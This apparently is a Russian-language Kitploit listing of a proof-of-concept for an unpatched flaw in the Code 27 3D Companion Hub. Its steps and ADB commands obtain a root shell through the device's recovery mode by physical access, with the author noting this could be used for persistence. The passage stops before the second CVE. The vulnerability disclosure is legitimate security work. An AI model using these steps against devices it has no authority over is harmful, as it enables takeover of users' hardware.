Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Code-27-Companion-Hub-Exploits — Proof of concept для CVE-2026-36027 и CVE-2026-36028 | Kitploit
Инструменты/GitHubGitHub/redr0nin/code-27-companion-hub-exploits
Безопасность AndroidБезопасность встроенных системПовышение привилегийБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАппаратная Безопасность

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
redr0nin/code-27-companion-hub-exploits

Code-27-Companion-Hub-Exploits

Proof of concept для CVE-2026-36027 и CVE-2026-36028

Репозиторий
1143 месяцев назадЕщё не проверено

Уязвимости Code 27 3D Companion Hub (CVE-2026-36027, CVE-2026-36028)

Code 27 3D Companion Hub — это физическое настольное устройство, отображающее пользовательского ИИ-персонажа («Коди») в виде анимированного 3D-компаньона. Пользователи могут загружать или создавать любые 3D-модели, а мультимодальный ИИ позволяет персонажу видеть окружающую обстановку, распознавать тон и язык тела, а также вести свободные беседы.

В этом материале описаны две уязвимости, требующие физического доступа к устройству. Обе были проверены на указанной ниже сборке и на момент публикации остаются неисправленными.

Code 27 3D Companion Hub

Уязвимое устройство / сборка

ПолеЗначение
ПродуктCode 27 3D Companion Hub
Версия Companion Hub UI1.2.0
SoC / платаRockchip RK3588S (rk3588s_yt921)
ОСAndroid 12
ID сборкиSQ3A.220705.003.A1
Полный fingerprintrk3588s_yt921-userdebug 12 SQ3A.220705.003.A1 eng.dj.20260203.134404 release-keys
Тип сборкиuserdebug / release-keys

В поставляемой прошивке используется userdebug-сборка (видно в баннере recovery и в ro.build.display.id). Сборки userdebug позволяют перезапускать adbd с правами root через adb root, что является ключевым фактором для существования CVE-2026-36027.

Экран версии Companion Hub, показывающий версию 1.2.0


CVE-2026-36027 — Произвольное выполнение кода через отладку по USB (ADB) в режиме восстановления

Краткое описание

Физически близкий злоумышленник может загрузить Companion Hub в режим восстановления Android и получить оболочку ADB с привилегиями root (uid=0, контекст SELinux u:r:su:s0). Поскольку устройство поставляется с userdebug-сборкой, adbd можно перезапустить с правами root с помощью adb root, что даёт злоумышленнику доступ на чтение/запись к среде восстановления, возможность перечислять свойства сборки и оборудования, а также доступ к функциям recovery (sideload, fastboot, работа с разделами).

Полученный доступ осуществляется в рамках ramdisk recovery, а не в работающей среде Android. В ходе тестирования действие Mount /system в recovery завершилось неудачей (libfs_mgr не смог открыть /dev/block/by-name/system), поэтому системный раздел не был напрямую смонтирован через этот путь, а загруженное пользовательское окружение с киоском и любыми расшифрованными пользовательскими данными в этом режиме не отображается.

Тем не менее это важно, потому что root-доступ к среде восстановления является основой для изменения постоянного состояния устройства (например, записи в разделы или установки специально созданного пакета обновлений), чтобы код злоумышленника мог запуститься при последующей обычной загрузке, тем самым закрепившись на работающем устройстве.

Доказательство концепции

  1. Выключите устройство.
  2. Когда устройство полностью выключится, одновременно зажмите кнопки питания и регулировки громкости, пока устройство не загрузится в меню восстановления Android.

Меню восстановления Android с подсвеченным пунктом Mount /system

  1. Подключите кабель USB-C к Companion Hub, а USB-A — к компьютеру.
  2. С помощью кнопок перейдите к пункту Mount /system, подсветите его и подтвердите. Операция, скорее всего, завершится ошибкой. Это ожидаемо, и эксплойт всё равно сработает. (В логах recovery будет сообщение libfs_mgr о невозможности открыть /dev/block/by-name/system.)
  3. Убедитесь, что устройство отображается в ADB на вашем компьютере:
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe devices
List of devices attached
YGKJ2601921S00193       recovery
  1. Устройство находится в режиме восстановления. Перезапустите adbd в контексте root:
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe root
restarting adbd as root
timeout expired while waiting for device
  1. Откройте оболочку — теперь вы root на устройстве:
PS C:\Users\John\Downloads\platform-tools-latest-windows\platform-tools> .\adb.exe shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid),3012(readtracefs) context=u:r:su:s0
# getprop ro.build.display.id
rk3588s_yt921-userdebug 12 SQ3A.220705.003.A1 eng.dj.20260203.134404 release-keys
# getprop ro.product.model
rk3588s_yt921
# getprop ro.build.version.release
12
  1. Имея root-оболочку, вы можете просматривать и взаимодействовать с файловой системой recovery:
Скачать инструмент